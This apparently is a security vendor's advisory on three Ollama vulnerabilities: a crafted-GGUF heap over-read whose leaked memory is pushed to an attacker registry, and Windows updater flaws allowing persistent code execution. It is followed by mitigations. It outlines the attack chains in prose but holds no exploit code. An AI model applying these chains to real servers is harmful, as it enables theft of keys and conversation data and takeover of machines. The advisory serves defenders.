Ollama, the widely-deployed framework for running large language models locally, contains three critical vulnerabilities that expose organizations to memory exfiltration and persistent code execution. The most severe flaw affects an estimated 300,000+ servers globally, while two additional vulnerabilities in the Windows client remain unpatched over 90 days after disclosure.
Bleeding Llama: CVE-2026-7482 Enables Complete Memory Exfiltration
CVE-2026-7482, dubbed "Bleeding Llama" by Cyera researchers, is a heap out-of-bounds read vulnerability carrying a CVSS score of 9.1. The flaw exists in Ollama versions prior to 0.17.1 and stems from improper validation of GGUF model files submitted to the /api/create endpoint. When processing attacker-supplied GGUF files where the declared tensor offset and size exceed the file's actual length, Ollama reads past allocated heap buffers during quantization operations in fs/ggml/gguf.go and server/quantization.go.
The vulnerability originates from Ollama's use of Go's unsafe package in the WriteTo() function, which bypasses the language's memory safety guarantees. This design choice creates a pathway for attackers to craft GGUF files with inflated tensor shapes that trigger out-of-bounds heap reads during model creation.
Three-Step Attack Chain Requires No Authentication
The exploitation process is straightforward and requires no authentication, as Ollama's REST API lacks built-in authentication mechanisms. Attackers execute a three-step chain: First, upload a maliciously crafted GGUF file with an inflated tensor shape to a network-accessible Ollama server via HTTP POST. Second, trigger model creation using the /api/create endpoint, which activates the out-of-bounds read vulnerability. Third, exfiltrate leaked memory data by pushing the resulting model artifact to an attacker-controlled registry through the /api/push endpoint.
Successful exploitation exposes environment variables, API keys, system prompts, and conversation data from concurrent users. Organizations using Ollama with development tools like Claude Code face amplified risk, as all tool outputs flow through the Ollama server and persist in heap memory.
"An attacker can learn basically anything about the organization from your AI inference—API keys, proprietary code, customer contracts, and much more," warned Cyera security researcher Dor Attias. The exposure scope extends to any data processed by the Ollama instance, making this particularly dangerous for organizations running local LLM inference on sensitive workloads.
Windows Update Mechanism Contains Two Unpatched Flaws
Striga researchers disclosed two additional vulnerabilities affecting Ollama's Windows update mechanism that remain unpatched as of May 2026, over 90 days after January 27 disclosure. CVE-2026-42248 (CVSS 7.7) involves missing signature verification that fails to validate update binaries before installation, unlike the macOS version. CVE-2026-42249 (CVSS 7.7) is a path traversal vulnerability where the Windows updater creates local paths for installer staging directories directly from HTTP response headers without sanitization.
The Windows desktop client auto-starts on login from the Startup folder, listens on 127.0.0.1:11434, and periodically polls the /api/update endpoint for updates. When chained with the on-login routine, these vulnerabilities enable attackers who can influence update responses to execute arbitrary code at every login. Ollama for Windows versions 0.12.10 through 0.17.5 are vulnerable.
Exploitation Scenarios and Persistence Mechanisms
Attackers can exploit the Windows flaws by controlling an update server reachable by the victim's Ollama client. One method involves overriding the OLLAMA_UPDATE_URL environment variable to point the client at a local server on plain HTTP. This assumes AutoUpdateEnabled is active, which is the default configuration. The missing integrity check alone enables code execution without requiring path traversal exploitation—the malicious installer drops into the expected staging directory and executes during the next launch from the Startup folder without signature re-verification.
However, this approach lacks persistence as legitimate updates overwrite the staged file. By combining path traversal, attackers redirect the executable outside the usual path, achieving persistent code execution that survives subsequent legitimate updates. The attack surface is significant given Ollama's popularity—the project has over 171,000 GitHub stars and has been forked more than 16,100 times.
Update to Ollama 0.17.1 or later immediately to address CVE-2026-7482. For Windows users running versions 0.12.10-0.17.5, disable automatic updates and remove Ollama shortcuts from the Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup) until patches are available.
Recommended Security Controls
Organizations running Ollama must implement multiple defense layers. Apply the latest patches for CVE-2026-7482 immediately and audit all running instances for internet exposure. Ollama instances should never be directly accessible from the internet—isolate them behind firewalls and deploy authentication proxies or API gateways to compensate for the lack of built-in authentication. Limit network access to trusted IP ranges and implement network segmentation to contain potential breaches.
- Update Ollama to version 0.17.1 or later to patch CVE-2026-7482
- Deploy authentication proxies or API gateways in front of all Ollama instances
- Audit and remove any Ollama instances exposed to the public internet
- Implement firewall rules restricting access to trusted networks only
- For Windows deployments, disable automatic updates until CVE-2026-42248 and CVE-2026-42249 are patched
- Remove Ollama from Windows Startup folders to prevent auto-execution of compromised updates
- Monitor /api/create and /api/push endpoint usage for anomalous activity
- Implement egress filtering to detect unauthorized data exfiltration attempts
Broader Implications for Local LLM Security
These vulnerabilities highlight critical security gaps in the local LLM deployment model that many organizations have adopted to maintain data privacy. The irony is stark: organizations choose local LLM deployment specifically to avoid cloud data exposure, yet insecure implementations create attack vectors that can leak the very data they sought to protect. The use of unsafe memory operations in performance-critical AI infrastructure components represents a concerning pattern as organizations race to deploy AI capabilities without adequate security review.
The 90-day disclosure window for the Windows vulnerabilities has elapsed with no patch available, placing the burden on security teams to implement compensating controls. CERT Polska has assumed coordination of the disclosure process, suggesting potential challenges in Ollama's vulnerability response procedures. With over 300,000 potentially affected servers and Ollama's deep integration into development workflows, the attack surface extends beyond individual instances to entire development pipelines and connected toolchains.
Questions about your exposure?
RedEye Security provides assessments for organizations that need to understand their real risk.
Talk to us